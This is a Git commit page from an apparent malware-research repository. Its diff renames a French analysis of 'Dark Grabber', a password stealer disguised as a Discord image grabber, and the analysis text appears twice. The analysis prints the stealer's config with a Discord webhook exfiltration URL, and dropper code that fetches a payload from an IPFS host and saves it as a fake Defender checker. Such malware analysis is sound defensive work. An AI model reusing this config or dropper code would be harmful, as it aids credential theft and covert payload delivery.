patate/Malware-Research
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

added Twitch Patcher wiper

Browse Source
This commit is contained in:
ALittlePatate
2023-02-26 17:01:00 +01:00
parent a449b58407
commit 50fd0ef4f0
6 changed files with 194 additions and 65 deletions
Download Patch File Download Diff File Expand all files Collapse all files

130
Random/Dark Grabber/writeup.md → Random/Dark Grabber/readme.md Executable file → Normal file
View File

@@ -1,65 +1,65 @@
# Dark Grabber
C'est un password stealer qui se fait passer pour un "Image grabber discord", il est distribué par **! 刀3ズ GMB#3666** sur discord notamment.
Il existe deux versions du stealer, une appelée "Debug" et une "Normale".
<br>
Les deux sont dans le même .zip et les admins demandent de les lancer les deux.
*insérer une capture*
## Version Normale
Elle est appelée "Install Dark Grabber.bin".
<br>
[Virustotal](https://www.virustotal.com/gui/file/8a12f091c08d2287409465e04c15d1ce53da419b626565a8e783e22bbe2368f4)<br>
C'est du Python 3.10 compilé avec pyinstaller.<br>
On peut utiliser [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) avec [pycdc](https://github.com/zrax/pycdc) pour retrouver la source.
<br>
On extrait les fichiers :
* antidebug.py
* browsers.py
* config.py
* discordtoken.py
* injection.py
* 'Install Dark Grabber'.py
* startup.py
* systeminfo.py
Les fichiers sont dans [l'annexe.](https://github.com/ALittlePatate/Malware-Research/tree/master/Random/Dark%20Grabber/Annexes)
C'est un stealer python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord.
La config :
```Python
__CONFIG__ = {
'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp',
'antidebug': True,
'browsers': True,
'discordtoken': True,
'injection': True,
'startup': True,
'systeminfo': True }
```
## Version Debug
Le fichier est appelé "Install Debug Dark Grabber", le nom original est "deno.exe".
<br>
[Virustotal](https://www.virustotal.com/gui/file/c5e5db042d3a3e12b8484f29594d157268e3c63631f3a0ffd588ff7ad1d42e2f)
<br>
C'est du typescript compilé avec [deno](https://deno.land/), il n'existe pas d'extracteur pour deno mais il stocke le code en clair dans l'exe. On peut le dump avec un éditeur hexadécimal comme [HxD](https://mh-nexus.de/en/hxd/).
<br>
On extrait le code ci dessous dans **main.ts** :
```typescript
import { download, Destination } from "https://deno.land/x/download/mod.ts";
await download("https://bafybeid7gnnacqshr64a6rpn6wevtexbw7kpiv2ckkrcdtnnmdtvd35j2e.ipfs.nftstorage.link/ikiyq", destination);
```
Ce code va télécharger ikiyq.exe et l'enregistrer sur le disque à `C:/Users/${username}/` sous le nom `Microsoft-Defender-Checker.exe`.
`Microsoft-Defender-Checker.exe` est une dropper avec quelques decoys, il va drop `ikiyq.exe` qui est le stage final.<br>
[Virustotal de ikiyq.exe](https://www.virustotal.com/gui/file/392a8b2d7633da3a89247681ee1161a93f872d5a9ecee88ef8ed6e578225b71d)<br>
Pour finir, `ikiyq.exe` est du Python compilé avec [Nuitka](https://github.com/Nuitka/Nuitka).
# Dark Grabber
C'est un password stealer qui se fait passer pour un "Image grabber discord", il est distribué par **! 刀3ズ GMB#3666** sur discord notamment.
Il existe deux versions du stealer, une appelée "Debug" et une "Normale".
<br>
Les deux sont dans le même .zip et les admins demandent de les lancer les deux.
*insérer une capture*
## Version Normale
Elle est appelée "Install Dark Grabber.bin".
<br>
[Virustotal](https://www.virustotal.com/gui/file/8a12f091c08d2287409465e04c15d1ce53da419b626565a8e783e22bbe2368f4)<br>
C'est du Python 3.10 compilé avec pyinstaller.<br>
On peut utiliser [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) avec [pycdc](https://github.com/zrax/pycdc) pour retrouver la source.
<br>
On extrait les fichiers :
* antidebug.py
* browsers.py
* config.py
* discordtoken.py
* injection.py
* 'Install Dark Grabber'.py
* startup.py
* systeminfo.py
Les fichiers sont dans [l'annexe.](https://github.com/ALittlePatate/Malware-Research/tree/master/Random/Dark%20Grabber/Annexes)
C'est un stealer python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord.
La config :
```Python
__CONFIG__ = {
'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp',
'antidebug': True,
'browsers': True,
'discordtoken': True,
'injection': True,
'startup': True,
'systeminfo': True }
```
## Version Debug
Le fichier est appelé "Install Debug Dark Grabber", le nom original est "deno.exe".
<br>
[Virustotal](https://www.virustotal.com/gui/file/c5e5db042d3a3e12b8484f29594d157268e3c63631f3a0ffd588ff7ad1d42e2f)
<br>
C'est du typescript compilé avec [deno](https://deno.land/), il n'existe pas d'extracteur pour deno mais il stocke le code en clair dans l'exe. On peut le dump avec un éditeur hexadécimal comme [HxD](https://mh-nexus.de/en/hxd/).
<br>
On extrait le code ci dessous dans **main.ts** :
```typescript
import { download, Destination } from "https://deno.land/x/download/mod.ts";
await download("https://bafybeid7gnnacqshr64a6rpn6wevtexbw7kpiv2ckkrcdtnnmdtvd35j2e.ipfs.nftstorage.link/ikiyq", destination);
```
Ce code va télécharger ikiyq.exe et l'enregistrer sur le disque à `C:/Users/${username}/` sous le nom `Microsoft-Defender-Checker.exe`.
`Microsoft-Defender-Checker.exe` est une dropper avec quelques decoys, il va drop `ikiyq.exe` qui est le stage final.<br>
[Virustotal de ikiyq.exe](https://www.virustotal.com/gui/file/392a8b2d7633da3a89247681ee1161a93f872d5a9ecee88ef8ed6e578225b71d)<br>
Pour finir, `ikiyq.exe` est du Python compilé avec [Nuitka](https://github.com/Nuitka/Nuitka).